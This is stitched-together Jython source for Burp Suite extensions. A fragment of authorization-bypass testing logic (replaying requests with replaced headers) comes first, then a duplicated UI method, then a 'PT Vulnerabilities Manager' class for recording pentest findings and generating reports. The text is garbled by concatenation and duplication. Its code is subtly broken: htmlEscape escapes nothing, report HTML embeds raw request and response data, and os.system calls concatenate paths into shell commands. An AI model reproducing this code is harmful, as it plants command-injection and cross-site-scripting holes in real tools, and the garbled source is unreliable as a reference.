self._helpers.analyzeRequest(messageInfo) headers = requestInfo.getHeaders() if removeOrNot: headers = list(headers) removeHeaders = ArrayList() removeHeaders.add(self.replaceString.getText()[0:self.replaceString.getText().index(":")]) for header in headers[:]: for removeHeader in removeHeaders: if removeHeader in header: headers.remove(header) if authorizeOrNot: headers.append(self.replaceString.getText()) msgBody = messageInfo.getRequest()[requestInfo.getBodyOffset():] return self._helpers.buildHttpMessage(headers, msgBody) def checkBypass(self,oldStatusCode,newStatusCode,oldContentLen,newContentLen,filters,requestResponse): analyzedResponse = self._helpers.analyzeResponse(requestResponse.getResponse()) impression = "" if oldStatusCode == newStatusCode: if oldContentLen == newContentLen: impression = self._enfocementStatuses[0] else: auth_enforced = 1 for filter in filters: if str(filter).startswith("Headers (simple string): "): if not(filter[25:] in self._helpers.bytesToString(requestResponse.getResponse()[0:analyzedResponse.getBodyOffset()])): auth_enforced = 0 if str(filter).startswith("Headers (regex): "): regex_string = filter[17:] p = re.compile(regex_string, re.IGNORECASE) if not p.search(self._helpers.bytesToString(requestResponse.getResponse()[0:analyzedResponse.getBodyOffset()])): auth_enforced = 0 if str(filter).startswith("Body (simple string): "): if not(filter[22:] in self._helpers.bytesToString(requestResponse.getResponse()[analyzedResponse.getBodyOffset():])): auth_enforced = 0 if str(filter).startswith("Body (regex): "): regex_string = filter[14:] p = re.compile(regex_string, re.IGNORECASE) if not p.search(self._helpers.bytesToString(requestResponse.getResponse()[analyzedResponse.getBodyOffset():])): auth_enforced = 0 if str(filter).startswith("Full request (simple string): "): if not(filter[30:] in self._helpers.bytesToString(requestResponse.getResponse())): auth_enforced = 0 if str(filter).startswith("Full request (regex): "): regex_string = filter[22:] p = re.compile(regex_string, re.IGNORECASE) if not p.search(self._helpers.bytesToString(requestResponse.getResponse())): auth_enforced = 0 if str(filter).startswith("Content-Length: "): if newContentLen != filter: auth_enforced = 0 if auth_enforced: impression = self._enfocementStatuses[2] else: impression = self._enfocementStatuses[1] else: impression = self._enfocementStatuses[2] return impression def checkAuthorization(self, messageInfo, originalHeaders, checkUnauthorized): message = self.makeMessage(messageInfo,True,True) requestResponse = self.makeRequest(messageInfo, message) analyzedResponse = self._helpers.analyzeResponse(requestResponse.getResponse()) oldStatusCode = originalHeaders[0] newStatusCode = analyzedResponse.getHeaders()[0] oldContentLen = self.getContentLength(originalHeaders) newContentLen = self.getContentLength(analyzedResponse.getHeaders()) # Check unauthorized request if checkUnauthorized: messageUnauthorized = self.makeMessage(messageInfo,True,False) requestResponseUnauthorized = self.makeRequest(messageInfo, messageUnauthorized) analyzedResponseUnauthorized = self._helpers.analyzeResponse(requestResponseUnauthorized.getResponse()) statusCodeUnauthorized = analyzedResponseUnauthorized.getHeaders()[0] contentLenUnauthorized = self.getContentLength(analyzedResponseUnauthorized.getHeaders()) EDFilters = self.EDModel.toArray() impression = self.checkBypass(oldStatusCode,newStatusCode,oldContentLen,newContentLen,EDFilters,requestResponse) if checkUnauthorized: EDFiltersUnauth = self.EDModelUnauth.toArray() impressionUnauthorized = self.checkBypass(oldStatusCode,statusCodeUnauthorized,oldContentLen,contentLenUnauthorized,EDFiltersUnauth,requestResponseUnauthorized) self._lock.acquire() row = self._log.size() if checkUnauthorized: self._log.add(LogEntry(self.currentRequestNumber,self._callbacks.saveBuffersToTempFiles(requestResponse), self._helpers.analyzeRequest(requestResponse).getUrl(),messageInfo,impression,self._callbacks.saveBuffersToTempFiles(requestResponseUnauthorized),impressionUnauthorized)) # same requests not include again. else: self._log.add(LogEntry(self.currentRequestNumber,self._callbacks.saveBuffersToTempFiles(requestResponse), self._helpers.analyzeRequest(requestResponse).getUrl(),messageInfo,impression,None,"Disabled")) # same requests not include again. self.fireTableRowsInserted(row, row) self.currentRequestNumber = self.currentRequestNumber + 1 self._lock.release() def getContentLength(self, analyzedResponseHeaders): for header in analyzedResponseHeaders: if "Content-Length:" in header: return header; return "null" def getCookieFromMessage(self, messageInfo): headers = list(self._helpers.analyzeRequest(messageInfo.getRequest()).getHeaders()) for header in headers: if "Cookie:" in header: return header return None
def initVulnerabilityTab(self): # ## init vulnerability tab # nameLabel = JLabel("Vulnerability Name:") nameLabel.setBounds(10, 10, 140, 30) self.addButton = JButton("Add",actionPerformed=self.addVuln) self.addButton.setBounds(10, 500, 100, 30) rmVulnButton = JButton("Remove",actionPerformed=self.rmVuln) rmVulnButton.setBounds(465, 500, 100, 30) mitigationLabel = JLabel("Mitigation:") mitigationLabel.setBounds(10, 290, 150, 30) addSSBtn = JButton("Add SS",actionPerformed=self.addSS) addSSBtn.setBounds(750, 40, 110, 30) deleteSSBtn = JButton("Remove SS",actionPerformed=self.removeSS) deleteSSBtn.setBounds(750, 75, 110, 30) piclistLabel = JLabel("Images list:") piclistLabel.setBounds(580, 10, 140, 30) self.screenshotsList = DefaultListModel() self.ssList = JList(self.screenshotsList) self.ssList.setBounds(580, 40, 150, 250) self.ssList.addListSelectionListener(ssChangedHandler(self)) self.ssList.setBorder(BorderFactory.createLineBorder(Color.GRAY)) previewPicLabel = JLabel("Selected image preview: (click to open in image viewer)") previewPicLabel.setBounds(580, 290, 500, 30) copyImgMenu = JMenuItem("Copy") copyImgMenu.addActionListener(copyImg(self)) self.imgMenu = JPopupMenu("Popup") self.imgMenu.add(copyImgMenu) self.firstPic = JLabel() self.firstPic.setBorder(BorderFactory.createLineBorder(Color.GRAY)) self.firstPic.setBounds(580, 320, 550, 400) self.firstPic.addMouseListener(imageClicked(self)) self.vulnName = JTextField("") self.vulnName.getDocument().addDocumentListener(vulnTextChanged(self)) self.vulnName.setBounds(140, 10, 422, 30) sevirities = ["Unclassified", "Critical","High","Medium","Low"] self.threatLevel = JComboBox(sevirities); self.threatLevel.setBounds(140, 45, 140, 30) colors = ["Color:", "Green", "Red"] self.colorCombo = JComboBox(colors); self.colorCombo.setBounds(465, 45, 100, 30) self.colorCombo severityLabel = JLabel("Threat Level:") severityLabel.setBounds(10, 45, 100, 30) descriptionLabel = JLabel("Description:") descriptionLabel.setBounds(10, 80, 100, 30) self.descriptionString = JTextArea("", 5, 30) self.descriptionString.setWrapStyleWord(True); self.descriptionString.setLineWrap(True) self.descriptionString.setBounds(10, 110, 555, 175) descriptionStringScroll = JScrollPane(self.descriptionString) descriptionStringScroll.setBounds(10, 110, 555, 175) descriptionStringScroll.setVerticalScrollBarPolicy(ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED) self.mitigationStr = JTextArea("", 5, 30) self.mitigationStr.setWrapStyleWord(True); self.mitigationStr.setLineWrap(True) self.mitigationStr.setBounds(10, 320, 555, 175) mitigationStrScroll = JScrollPane(self.mitigationStr) mitigationStrScroll.setBounds(10, 320, 555, 175) mitigationStrScroll.setVerticalScrollBarPolicy(ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED) self.pnl = JPanel() self.pnl.setBounds(0, 0, 1000, 1000); self.pnl.setLayout(None); self.pnl.add(addSSBtn) self.pnl.add(piclistLabel) self.pnl.add(nameLabel) self.pnl.add(deleteSSBtn) self.pnl.add(rmVulnButton) self.pnl.add(severityLabel) self.pnl.add(mitigationLabel) self.pnl.add(descriptionLabel) self.pnl.add(previewPicLabel) self.pnl.add(mitigationStrScroll) self.pnl.add(descriptionStringScroll) self.pnl.add(self.ssList) self.pnl.add(self.firstPic) self.pnl.add(self.addButton) self.pnl.add(self.vulnName) self.pnl.add(self.threatLevel) self.pnl.add(self.colorCombo)
class BurpExtender(IBurpExtender, ITab, IMessageEditorController, AbstractTableModel, IContextMenuFactory): def registerExtenderCallbacks(self, callbacks): # keep a reference to our callbacks object self._callbacks = callbacks # obtain an extension helpers object self._helpers = callbacks.getHelpers() # set our extension name callbacks.setExtensionName("PT Vulnerabilities Manager") self.config = SafeConfigParser() self.createSection('projects') self.createSection('general') self.config.read('config.ini') self.chooser = JFileChooser() # create the log and a lock on which to synchronize when adding log entries self._log = ArrayList() self._lock = Lock() self.logTable = Table(self) self.logTable.getColumnModel().getColumn(0).setMaxWidth(35) self.logTable.getColumnModel().getColumn(1).setMinWidth(100) self._requestViewer = self._callbacks.createMessageEditor(self, False) self._responseViewer = self._callbacks.createMessageEditor(self, False) self.initVulnerabilityTab() self.initProjSettingsTab() self.initTabs() self.initCallbacks() if self.projPath.getText() != None: self.loadVulnerabilities(self.projPath.getText()) print "Thank you for installing PT Vulnerabilities Manager v1.0 extension" print "by Barak Tawily\n\n\n" print "Disclaimer:\nThis extension might create folders and files in your hardisk which might be declared as sensitive information, make sure you are creating projects under encrypted partition" return def initVulnerabilityTab(self): # ## init vulnerability tab # nameLabel = JLabel("Vulnerability Name:") nameLabel.setBounds(10, 10, 140, 30) self.addButton = JButton("Add",actionPerformed=self.addVuln) self.addButton.setBounds(10, 500, 100, 30) rmVulnButton = JButton("Remove",actionPerformed=self.rmVuln) rmVulnButton.setBounds(465, 500, 100, 30) mitigationLabel = JLabel("Mitigation:") mitigationLabel.setBounds(10, 290, 150, 30) addSSBtn = JButton("Add SS",actionPerformed=self.addSS) addSSBtn.setBounds(750, 40, 110, 30) deleteSSBtn = JButton("Remove SS",actionPerformed=self.removeSS) deleteSSBtn.setBounds(750, 75, 110, 30) piclistLabel = JLabel("Images list:") piclistLabel.setBounds(580, 10, 140, 30) self.screenshotsList = DefaultListModel() self.ssList = JList(self.screenshotsList) self.ssList.setBounds(580, 40, 150, 250) self.ssList.addListSelectionListener(ssChangedHandler(self)) self.ssList.setBorder(BorderFactory.createLineBorder(Color.GRAY)) previewPicLabel = JLabel("Selected image preview: (click to open in image viewer)") previewPicLabel.setBounds(580, 290, 500, 30) copyImgMenu = JMenuItem("Copy") copyImgMenu.addActionListener(copyImg(self)) self.imgMenu = JPopupMenu("Popup") self.imgMenu.add(copyImgMenu) self.firstPic = JLabel() self.firstPic.setBorder(BorderFactory.createLineBorder(Color.GRAY)) self.firstPic.setBounds(580, 320, 550, 400) self.firstPic.addMouseListener(imageClicked(self)) self.vulnName = JTextField("") self.vulnName.getDocument().addDocumentListener(vulnTextChanged(self)) self.vulnName.setBounds(140, 10, 422, 30) sevirities = ["Unclassified", "Critical","High","Medium","Low"] self.threatLevel = JComboBox(sevirities); self.threatLevel.setBounds(140, 45, 140, 30) colors = ["Color:", "Green", "Red"] self.colorCombo = JComboBox(colors); self.colorCombo.setBounds(465, 45, 100, 30) self.colorCombo severityLabel = JLabel("Threat Level:") severityLabel.setBounds(10, 45, 100, 30) descriptionLabel = JLabel("Description:") descriptionLabel.setBounds(10, 80, 100, 30) self.descriptionString = JTextArea("", 5, 30) self.descriptionString.setWrapStyleWord(True); self.descriptionString.setLineWrap(True) self.descriptionString.setBounds(10, 110, 555, 175) descriptionStringScroll = JScrollPane(self.descriptionString) descriptionStringScroll.setBounds(10, 110, 555, 175) descriptionStringScroll.setVerticalScrollBarPolicy(ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED) self.mitigationStr = JTextArea("", 5, 30) self.mitigationStr.setWrapStyleWord(True); self.mitigationStr.setLineWrap(True) self.mitigationStr.setBounds(10, 320, 555, 175) mitigationStrScroll = JScrollPane(self.mitigationStr) mitigationStrScroll.setBounds(10, 320, 555, 175) mitigationStrScroll.setVerticalScrollBarPolicy(ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED) self.pnl = JPanel() self.pnl.setBounds(0, 0, 1000, 1000); self.pnl.setLayout(None); self.pnl.add(addSSBtn) self.pnl.add(piclistLabel) self.pnl.add(nameLabel) self.pnl.add(deleteSSBtn) self.pnl.add(rmVulnButton) self.pnl.add(severityLabel) self.pnl.add(mitigationLabel) self.pnl.add(descriptionLabel) self.pnl.add(previewPicLabel) self.pnl.add(mitigationStrScroll) self.pnl.add(descriptionStringScroll) self.pnl.add(self.ssList) self.pnl.add(self.firstPic) self.pnl.add(self.addButton) self.pnl.add(self.vulnName) self.pnl.add(self.threatLevel) self.pnl.add(self.colorCombo) def initProjSettingsTab(self): # init project settings projNameLabel = JLabel("Name:") projNameLabel.setBounds(10, 50, 140, 30) self.projName = JTextField("") self.projName.setBounds(140, 50, 320, 30) self.projName.getDocument().addDocumentListener(projTextChanged(self)) detailsLabel = JLabel("Details:") detailsLabel.setBounds(10, 120, 140, 30) reportLabel = JLabel("Generate Report:") reportLabel.setBounds(10, 375, 140, 30) types = ["DOCX","HTML","XLSX"] self.reportType = JComboBox(types) self.reportType.setBounds(10, 400, 140, 30) generateReportButton = JButton("Generate", actionPerformed=self.generateReport) generateReportButton.setBounds(160, 400, 90, 30) self.projDetails = JTextArea("", 5, 30) self.projDetails.setWrapStyleWord(True); self.projDetails.setLineWrap(True) projDetailsScroll = JScrollPane(self.projDetails) projDetailsScroll.setBounds(10, 150, 450, 175) projDetailsScroll.setVerticalScrollBarPolicy(ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED) projPathLabel = JLabel("Path:") projPathLabel.setBounds(10, 90, 140, 30) self.projPath = JTextField("") self.projPath.setBounds(140, 90, 320, 30) chooseProjPathButton = JButton("Browse...",actionPerformed=self.chooseProjPath) chooseProjPathButton.setBounds(470, 90, 100, 30) importProjButton = JButton("Import",actionPerformed=self.importProj) importProjButton.setBounds(470, 10, 100, 30) exportProjButton = JButton("Export",actionPerformed=self.exportProj) exportProjButton.setBounds(575, 10, 100, 30) openProjButton = JButton("Open Directory",actionPerformed=self.openProj) openProjButton.setBounds(680, 10, 130, 30) currentProjectLabel = JLabel("Current:") currentProjectLabel.setBounds(10, 10, 140, 30) projects = self.config.options('projects') self.currentProject = JComboBox(projects) self.currentProject.addActionListener(projectChangeHandler(self)) self.currentProject.setBounds(140, 10, 140, 30) self.autoSave = JCheckBox("Auto Save Mode") self.autoSave.setEnabled(False) # implement this feature self.autoSave.setBounds(300, 10, 140, 30) self.autoSave.setToolTipText("Will save any changed value while focus is out") addProjButton = JButton("Add / Update",actionPerformed=self.addProj) addProjButton.setBounds(10, 330, 150, 30) removeProjButton = JButton("Remove Current",actionPerformed=self.rmProj) removeProjButton.setBounds(315, 330, 146, 30) generalOptions = self.config.options('general') if 'default project' in generalOptions: defaultProj = self.config.get('general','default project') self.currentProject.getModel().setSelectedItem(defaultProj) self.projPath.setText(self.config.get('projects',self.currentProject.getSelectedItem())) self.clearProjTab = True self.projectSettings = JPanel() self.projectSettings.setBounds(0, 0, 1000, 1000) self.projectSettings.setLayout(None) self.projectSettings.add(reportLabel) self.projectSettings.add(detailsLabel) self.projectSettings.add(projPathLabel) self.projectSettings.add(addProjButton) self.projectSettings.add(openProjButton) self.projectSettings.add(projNameLabel) self.projectSettings.add(projDetailsScroll) self.projectSettings.add(importProjButton) self.projectSettings.add(exportProjButton) self.projectSettings.add(removeProjButton) self.projectSettings.add(generateReportButton) self.projectSettings.add(chooseProjPathButton) self.projectSettings.add(currentProjectLabel) self.projectSettings.add(self.projPath) self.projectSettings.add(self.autoSave) self.projectSettings.add(self.projName) self.projectSettings.add(self.reportType) self.projectSettings.add(self.currentProject) def initTabs(self): # ## init autorize tabs # self._splitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT) self.scrollPane = JScrollPane(self.logTable) self._splitpane.setLeftComponent(self.scrollPane) colorsMenu = JMenu("Paint") redMenu = JMenuItem("Red") noneMenu = JMenuItem("None") greenMenu = JMenuItem("Green") redMenu.addActionListener(paintChange(self, "Red")) noneMenu.addActionListener(paintChange(self, None)) greenMenu.addActionListener(paintChange(self, "Green")) colorsMenu.add(redMenu) colorsMenu.add(noneMenu) colorsMenu.add(greenMenu) self.menu = JPopupMenu("Popup") self.menu.add(colorsMenu) self.tabs = JTabbedPane() self.tabs.addTab("Request", self._requestViewer.getComponent()) self.tabs.addTab("Response", self._responseViewer.getComponent()) self.tabs.addTab("Vulnerability", self.pnl) self.tabs.addTab("Project Settings", self.projectSettings) self.tabs.setSelectedIndex(2) self._splitpane.setRightComponent(self.tabs) def initCallbacks(self): # ## init callbacks # # customize our UI components self._callbacks.customizeUiComponent(self._splitpane) self._callbacks.customizeUiComponent(self.logTable) self._callbacks.customizeUiComponent(self.scrollPane) self._callbacks.customizeUiComponent(self.tabs) self._callbacks.registerContextMenuFactory(self) # add the custom tab to Burp's UI self._callbacks.addSuiteTab(self) def loadVulnerabilities(self, projPath): self.clearList(None) selected = False for root, dirs, files in os.walk(projPath): # make it go only for dirs for dirName in dirs: xmlPath = projPath+"/"+dirName+"/vulnerability.xml" # xmlPath = xmlPath.replace("/","//") document = self.getXMLDoc(xmlPath) nodeList = document.getDocumentElement().getChildNodes() vulnName = nodeList.item(0).getTextContent() severity = nodeList.item(1).getTextContent() description = nodeList.item(2).getTextContent() mitigation = nodeList.item(3).getTextContent() color = nodeList.item(4).getTextContent() test = vulnerability(vulnName,severity,description,mitigation,color) self._lock.acquire() row = self._log.size() self._log.add(test) self.fireTableRowsInserted(row, row) self._lock.release() if vulnName == self.vulnName.getText(): self.logTable.setRowSelectionInterval(row,row) selected = True if selected == False and self._log.size() > 0: self.logTable.setRowSelectionInterval(0, 0) self.loadVulnerability(self._log.get(0)) def createSection(self, sectioName): self.config.read('config.ini') if not (sectioName in self.config.sections()): self.config.add_section(sectioName) cfgfile = open("config.ini",'w') self.config.write(cfgfile) cfgfile.close() def saveCfg(self): f = open('config.ini', 'w') self.config.write(f) f.close() def getXMLDoc(self, xmlPath): try: document = DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(xmlPath) return document except: self._extender.popup("XML file not found") return def saveXMLDoc(self, doc, xmlPath): transformerFactory = TransformerFactory.newInstance() transformer = transformerFactory.newTransformer() source = DOMSource(doc) result = StreamResult(File(xmlPath)) transformer.transform(source, result) def generateReport(self,event): if self.reportType.getSelectedItem() == "HTML": path = self.reportToHTML() if self.reportType.getSelectedItem() == "XLSX": path = self.reportToXLS() if self.reportType.getSelectedItem() == "DOCX": path = self.generateReportFromDocxTemplate('template.docx',"newfile.docx", 'word/document.xml') n = JOptionPane.showConfirmDialog(None, "Report generated successfuly:\n%s\nWould you like to open it?" % (path), "PT Manager", JOptionPane.YES_NO_OPTION) if n == JOptionPane.YES_OPTION: os.system('"' + path + '"') # Bug! stucking burp until the file get closed def exportProj(self,event): self.chooser.setDialogTitle("Save project") Ffilter = FileNameExtensionFilter("Zip files", ["zip"]) self.chooser.setFileFilter(Ffilter) returnVal = self.chooser.showSaveDialog(None) if returnVal == JFileChooser.APPROVE_OPTION: dst = str(self.chooser.getSelectedFile()) shutil.make_archive(dst,"zip",self.getCurrentProjPath()) self.popup("Project export successfuly") def importProj(self,event): self.chooser.setDialogTitle("Select project zip to directory") Ffilter = FileNameExtensionFilter("Zip files", ["zip"]) self.chooser.setFileFilter(Ffilter) returnVal = self.chooser.showOpenDialog(None) if returnVal == JFileChooser.APPROVE_OPTION: zipPath = str(self.chooser.getSelectedFile()) self.chooser.setDialogTitle("Select project directory") self.chooser.setFileSelectionMode(JFileChooser.DIRECTORIES_ONLY) returnVal = self.chooser.showOpenDialog(None) if returnVal == JFileChooser.APPROVE_OPTION: projPath = str(self.chooser.getSelectedFile()) + "/PTManager" with zipfile.ZipFile(zipPath, "r") as z: z.extractall(projPath) xmlPath = projPath + "/project.xml" document = self.getXMLDoc(xmlPath) nodeList = document.getDocumentElement().getChildNodes() projName = nodeList.item(0).getTextContent() nodeList.item(1).setTextContent(projPath) self.saveXMLDoc(document, xmlPath) self.config.set('projects', projName, projPath) self.saveCfg() self.reloadProjects() self.currentProject.getModel().setSelectedItem(projName) self.clearVulnerabilityTab() def reportToXLS(self): if not xlsxwriterImported: self.popup("xlsxwriter library is not imported") return workbook = xlsxwriter.Workbook(self.getCurrentProjPath() + '/PT Manager Report.xlsx') worksheet = workbook.add_worksheet() bold = workbook.add_format({'bold': True}) worksheet.write(0, 0, "Vulnerability Name", bold) worksheet.write(0, 1, "Threat Level", bold) worksheet.write(0, 2, "Description", bold) worksheet.write(0, 3, "Mitigation", bold) row = 1 for i in range(0,self._log.size()): worksheet.write(row, 0, self._log.get(i).getName()) worksheet.write(row, 1, self._log.get(i).getSeverity()) worksheet.write(row, 2, self._log.get(i).getDescription()) worksheet.write(row, 3, self._log.get(i).getMitigation()) row = row + 1 # add requests and images as well workbook.close() return self.getCurrentProjPath() + '/PT Manager Report.xlsx' def reportToHTML(self): htmlContent = """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="he" dir="ltr"> <head> <title>PT Manager Report</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style> body { background-repeat: no-repeat; background-attachment: fixed; font-family: Arial,Tahoma,sens-serif; font-size: 13px; margin: auto; } #warpcenter { width: 900px; margin: 0px auto; } table { border: 2px dashed #000000; } td { border-top: 2px dashed #000000; padding: 10px; } img { border: 0px; } </style> <script language="javascript"> function divHideShow(divToHideOrShow) { var div = document.getElementById(divToHideOrShow); if (div.style.display == "block") { div.style.display = "none"; } else { div.style.display = "block"; } } </script> </head> <body> <div id="warpcenter"> <h1> PT Manager Report </h1> <h2> Project: %s</h1> """ % (self.projName.getText()) for i in range(0,self._log.size()): name = self._log.get(i).getName() request = "None" response = "None" path = self.getVulnReqResPath("request",name) if os.path.exists(path): request = self.newlineToBR(self.getFileContent(path)) path = self.getVulnReqResPath("response",name) if os.path.exists(path): response = self.newlineToBR(self.getFileContent(path)) images = "" for fileName in os.listdir(self.projPath.getText()+"/"+self.clearStr(name)): if fileName.endswith(".jpg"): images += "%s<br><img src=\"%s\"><br><br>" % (fileName, self.projPath.getText()+"/"+self.clearStr(name) + "/" + fileName) description = self.newlineToBR(self._log.get(i).getDescription()) mitigation = self.newlineToBR(self._log.get(i).getMitigation()) htmlContent += self.convertVulntoTable(i,name,self._log.get(i).getSeverity(), description,mitigation, request, response, images) htmlContent += "</div></body></html>" f = open(self.getCurrentProjPath() + '/PT Manager Report.html', 'w') f.writelines(htmlContent) f.close() return self.getCurrentProjPath() + '/PT Manager Report.html' def newlineToBR(self,string): return "<br />".join(string.split("\n")) def getFileContent(self,path): f = open(path, "rb") content = f.read() f.close() return content def convertVulntoTable(self, number, name, severity, description, mitigation, request = "None", response = "None", images = "None"): return """<div style="width: 100%%;height: 30px;text-align: center;background-color:#E0E0E0;font-size: 17px;font-weight: bold;color: #000;padding-top: 10px;">%s <a href="javascript:divHideShow('Table_%s');" style="color:#191970">(OPEN / CLOSE)</a></div> <div id="Table_%s" style="display: none;"> <table width="100%%" cellspacing="0" cellpadding="0" style="margin: 0px auto;text-align: left;border-top: 0px;"> <tr> <td> <div style="font-size: 16px;font-weight: bold;"> <span style="color:#000000">Threat Level: </span> <span style="color:#8b8989">%s</span> </td> </tr> <tr> <td> <div style="font-size: 16px;font-weight: bold;"> <span style="color:#000000">Description</span> <a href="javascript:divHideShow('Table_%s_Command_03');" style="color:#191970">OPEN / CLOSE >>></a> </div> <div id="Table_%s_Command_03" style="display: none;margin-top: 25px;"> %s </div> </td> </tr> <tr> <td> <div style="font-size: 16px;font-weight: bold;"> <span style="color:#000000">Mitigration</span> <a href="javascript:divHideShow('Table_%s_Command_04');" style="color:#191970">OPEN / CLOSE >>></a> </div> <div id="Table_%s_Command_04" style="display: none;margin-top: 25px;"> %s <b> </td> </tr> <tr> <td> <div style="font-size: 16px;font-weight: bold;"> <span style="color:#000000">Request</span> <a href="javascript:divHideShow('Table_%s_Command_05');" style="color:#191970">OPEN / CLOSE >>></a> </div> <div id="Table_%s_Command_05" style="display: none;margin-top: 25px;"> %s <b> </td> </tr> <tr> <td> <div style="font-size: 16px;font-weight: bold;"> <span style="color:#000000">Response</span> <a href="javascript:divHideShow('Table_%s_Command_06');" style="color:#191970">OPEN / CLOSE >>></a> </div> <div id="Table_%s_Command_06" style="display: none;margin-top: 25px;"> %s <b> </td> </tr> <tr> <td> <div style="font-size: 16px;font-weight: bold;"> <span style="color:#000000">Images</span> <a href="javascript:divHideShow('Table_%s_Command_07');" style="color:#191970">OPEN / CLOSE >>></a> </div> <div id="Table_%s_Command_07" style="display: none;margin-top: 25px;"> %s <b> </td> </tr> </table> </div><br><br>""" % (name,number,number,severity,number,number,description,number,number,mitigation,number,number,request,number,number,response,number,number,images) def clearVulnerabilityTab(self, rmVuln=True): if rmVuln: self.vulnName.setText("") self.descriptionString.setText("") self.mitigationStr.setText("") self.colorCombo.setSelectedIndex(0) self.threatLevel.setSelectedIndex(0) self.screenshotsList.clear() self.addButton.setText("Add") self.firstPic.setIcon(None) def saveRequestResponse(self, type, requestResponse, vulnName): path = self.getVulnReqResPath(type,vulnName) f = open(path, 'wb') f.write(requestResponse) f.close() def openProj(self, event): os.system('explorer ' + self.projPath.getText()) def getVulnReqResPath(self, requestOrResponse, vulnName): return self.getCurrentProjPath() + "/" + self.clearStr(vulnName) + "/"+requestOrResponse+"_" + self.clearStr(vulnName) def htmlEscape(self,data): return data.replace('&', '&').replace('<', '<').replace('>', '>').replace('"', '"').replace("'", ''') def generateReportFromDocxTemplate(self, zipname, newZipName, filename): newZipName = self.getCurrentProjPath() + "/" + newZipName with zipfile.ZipFile(zipname, 'r') as zin: with zipfile.ZipFile(newZipName, 'w') as zout: zout.comment = zin.comment for item in zin.infolist(): if item.filename != filename: zout.writestr(item, zin.read(item.filename)) else: xml_content = zin.read(item.filename) result = re.findall("(.*)<w:body>(?:.*)<\/w:body>(.*)",xml_content)[0] newXML = result[0] templateBody = re.findall("<w:body>(.*)<\/w:body>", xml_content)[0] newBody = "" for i in range(0,self._log.size()): tmp = templateBody tmp = tmp.replace("$vulnerability", self.htmlEscape(self._log.get(i).getName())) tmp = tmp.replace("$severity", self.htmlEscape(self._log.get(i).getSeverity())) tmp = tmp.replace("$description", self.htmlEscape(self._log.get(i).getDescription())) tmp = tmp.replace("$mitigation", self.htmlEscape(self._log.get(i).getMitigation())) newBody = newBody + tmp newXML = newXML + newBody newXML = newXML + result[1] with zipfile.ZipFile(newZipName, mode='a', compression=zipfile.ZIP_DEFLATED) as zf: zf.writestr(filename, newXML) return newZipName def chooseProjPath(self, event): self.chooser.setDialogTitle("Select target directory") self.chooser.setFileSelectionMode(JFileChooser.DIRECTORIES_ONLY) returnVal = self.chooser.showOpenDialog(None) if returnVal == JFileChooser.APPROVE_OPTION: projPath = str(self.chooser.getSelectedFile()) + "/PTManager" os.makedirs(projPath) self.projPath.setText(projPath) def reloadProjects(self): self.currentProject.setModel(DefaultComboBoxModel(self.config.options('projects'))) def rmProj(self, event): if self.popUpAreYouSure() == JOptionPane.YES_OPTION: self._requestViewer.setMessage("None", False) self._responseViewer.setMessage("None", False) shutil.rmtree(self.projPath.getText()) self.config.remove_option('projects',self.currentProject.getSelectedItem()) self.reloadProjects() self.currentProject.setSelectedIndex(0) self.loadVulnerabilities(self.projPath.getText()) def popup(self,msg): JOptionPane.showMessageDialog(None,msg) def addProj(self, event): projPath = self.projPath.getText() if projPath == None or projPath == "": self.popup("Please select path") return self.config.set('projects', self.projName.getText(), projPath) self.saveCfg() xml = ET.Element('project') name = ET.SubElement(xml, "name") path = ET.SubElement(xml, "path") details = ET.SubElement(xml, "details") autoSaveMode = ET.SubElement(xml, "autoSaveMode") name.text = self.projName.getText() path.text = projPath details.text = self.projDetails.getText() autoSaveMode.text = str(self.autoSave.isSelected()) tree = ET.ElementTree(xml) try: tree.write(self.getCurrentProjPath()+'/project.xml') except: self.popup("Invalid path") return self.reloadProjects() self.clearVulnerabilityTab() self.clearList(None) self.currentProject.getModel().setSelectedItem(self.projName.getText()) def resize(self, image, width, height): bi = BufferedImage(width, height, BufferedImage.TRANSLUCENT) g2d = bi.createGraphics() g2d.addRenderingHints(RenderingHints(RenderingHints.KEY_RENDERING, RenderingHints.VALUE_RENDER_QUALITY)) g2d.drawImage(image, 0, 0, width, height, None) g2d.dispose() return bi; def clearStr(self, var): return var.replace(" " , "_").replace("\\" , "").replace("/" , "").replace(":" , "").replace("*" , "").replace("?" , "").replace("\"" , "").replace("<" , "").replace(">" , "").replace("|" , "").replace("(" , "").replace(")" , "") def popUpAreYouSure(self): dialogResult = JOptionPane.showConfirmDialog(None,"Are you sure?","Warning",JOptionPane.YES_NO_OPTION) if dialogResult == 0: return 0 return 1 def removeSS(self,event): if self.popUpAreYouSure() == JOptionPane.YES_OPTION: os.remove(self.getCurrentVulnPath() + "/" + self.ssList.getSelectedValue()) self.ssList.getModel().remove(self.ssList.getSelectedIndex()) self.firstPic.setIcon(ImageIcon(None)) # check if there is images and select the first one # bug in linux def addSS(self,event): clipboard = Toolkit.getDefaultToolkit().getSystemClipboard() try: image = clipboard.getData(DataFlavor.imageFlavor) except: self.popup("Clipboard not contains image") return vulnPath = self.projPath.getText() + "/" + self.clearStr(self.vulnName.getText()) if not os.path.exists(vulnPath): os.makedirs(vulnPath) name = self.clearStr(self.vulnName.getText()) + str(random.randint(1, 99999))+".jpg" fileName = self.projPath.getText()+"/"+ self.clearStr(self.vulnName.getText()) + "/" + name file = File(fileName) bufferedImage = BufferedImage(image.getWidth(None), image.getHeight(None), BufferedImage.TYPE_INT_RGB); g = bufferedImage.createGraphics(); g.drawImage(image, 0, 0, bufferedImage.getWidth(), bufferedImage.getHeight(), Color.WHITE, None); ImageIO.write(bufferedImage, "jpg", file) self.addVuln(self) self.ssList.setSelectedValue(name,True) def rmVuln(self, event): if self.popUpAreYouSure() == JOptionPane.YES_OPTION: self._requestViewer.setMessage("None", False) self._responseViewer.setMessage("None", False) shutil.rmtree(self.getCurrentVulnPath()) self.clearVulnerabilityTab() self.loadVulnerabilities(self.getCurrentProjPath()) def addVuln(self, event): if self.colorCombo.getSelectedItem() == "Color:": colorTxt = None else: colorTxt = self.colorCombo.getSelectedItem() 